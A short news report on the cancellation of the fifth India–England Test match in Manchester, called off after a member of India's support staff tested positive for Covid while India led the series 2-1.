The fifth Test match between India and England in Manchester has been called off after a member of Team India’s support staff tested positive for Covid. The series’ final game, which India leads 2-1, was scheduled to begin on Friday. This comes only days after Ravi Shastri, Bharat Arun, and R Sridhar were forced to skip the fourth Test at The Oval due to quarantine in London.
Though no players have tested positive, the possibility of the virus spreading further within the team cannot be ruled out because most of the cricketers were in close contact with the support personnel throughout the last Test. The entire team had undergone the RT-PCR test after the coaches’ positive test last week. The member of the squad who tested positive on Thursday had previously tested negative.
